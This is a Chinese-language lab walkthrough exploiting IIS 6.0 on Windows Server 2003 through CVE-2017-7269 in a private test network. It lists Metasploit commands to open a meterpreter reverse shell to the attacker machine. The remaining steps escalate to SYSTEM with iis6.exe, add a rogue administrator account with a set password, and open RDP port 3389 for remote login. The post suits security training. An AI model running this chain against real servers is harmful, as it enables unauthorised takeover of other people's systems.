一.實驗環境搭建
1.目標機:windows server 2003 r2
2.iis配置
目標機ip:192.168.1.175
二.攻擊機器
一臺kai liunx
ip:192.168.1.144
三.開始攻擊了
exp:https://github.com/zcgonvh/cve-2017-7269
1.把exp 複製到攻擊機器的/usr/share/metasploit-framework/modules/exploits/windows/iis目錄下
2.打開神器Metasploit
3.輸入use命令,use exploit/windows/iis/cve-2017-7269
4.使用命令show options
5.設置目標機ip,set RHOST 192.168.1.175
6.設置對面網站,set HttpHost 192.168.1.175
7.設置返回載荷,set payload windows/meterpreter/reverse_tcp
8.設置攻擊機ip,set LHOST 192.168.1.144
9.進行溢出,exploit
10.如果出現錯誤Exploit completed, but no session was created,有可能是攻擊的過多,可以嘗試重啓,實在不行就恢復快照
11.輸入shell命令,來到了我們所熟悉的界面
12.查看當前用戶權限,whoami,發現只是個一般用戶權限
13.cd到網站目錄,命令:c:\Inetpub\wwwroot,但是小編這裏是沒有權限進行創建文件,文件夾等操作的
14.來到c盤根目錄,cd c:\,進行新建文件夾,發現創建成功(實際情況中就只有一個文件夾一個文件夾的尋找了)
14.按Ctrl + C退出shell,輸出y
15.利用Metasploit的上傳功能,把提權工具iis6.exe上傳到剛剛新建的文件裏(提權工具有很多,iis6.exe,pr.exe等等)
16.又回到shell裏面確定工具上傳是否成功
17.利用工具進行提權,命令:iis6.exe "whoami",已經是system權限了
18.進行新建用戶,iis6.exe "net user DarkHQ !@#qwe123 /add"
19.添加用戶到管理員,iis6.exe "net localhost administrators DarkHQ /add"
20.查看遠程連接是否打開,沒有打開,命令:netstat -an
21.再上傳一個開3389.bat,利用iis6.exe運行,打開目標機的3389端口(上傳3389.bat的方法和上面iis6.exe上傳方法一樣)
命令:iis6.exe "3389.bat"
22.查看是否打開,netstat -an,已經成功打開
23.進行遠程連接,本地cmd輸入命令:mstsc
24.利用之前新建的管理員成功登錄
感謝各位大佬賞臉,有什麼不足的地方請多多指教,歡迎意見轟炸,謝謝!!!